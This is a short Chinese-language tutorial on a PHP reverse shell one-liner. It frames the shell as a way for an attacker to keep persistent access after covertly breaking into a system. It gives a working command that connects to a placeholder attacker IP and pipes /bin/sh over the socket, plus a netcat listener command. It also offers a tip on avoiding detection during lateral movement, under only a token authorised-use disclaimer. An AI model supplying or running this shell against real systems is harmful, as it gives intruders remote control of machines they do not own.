PHP Reverse Shell Oneliner

在网络安全中，反向 shell 是一种非常有用的技术，可以使攻击者在偷偷地入侵系统后维持持久性，并使其能够在任何时间返回该系统，而不必重新得到访问权限。 在 PHP 中，这个反向 shell 可以非常容易地实现，只需一行代码即可。

以下是一个简单易用的 PHP 反向 shell oneliner:

php -r '$sock=fsockopen("<your-IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

该 one-liner 中的代码段使用 PHP 的 -r 选项，以运行提供的 PHP 代码。代码打开一个与攻击者的主机的连接，然后在另一个文件描述符上（3，在连接上），将 bash shell 的 stdin、stdout 和 stderr 重定向到攻击者的主机上。

在使用此 oneliner 之前，需要在攻击者机器上启动一个监听器，并将端口指定为代码中使用的端口。

示例使用 netcat 监听器，指定端口 1234：

nc -vvlnp 1234

注意事项

1. 需要进行横向移动并在攻击者计算机上运行脚本时，请使用无线脚本，以免在传输过程中被发现。
2. 确保监听端口与使用该 oneliner 的端口相同。
3. 仅使用在安全环境下进行测试，切勿在未经授权的环境中使用。

如果能熟练使用这个简单的 oneliner，那么在必要时，您将能够更快更容易地使用 PHP 对系统进行反向 shell。但是请务必小心，以免出现不必要的安全问题。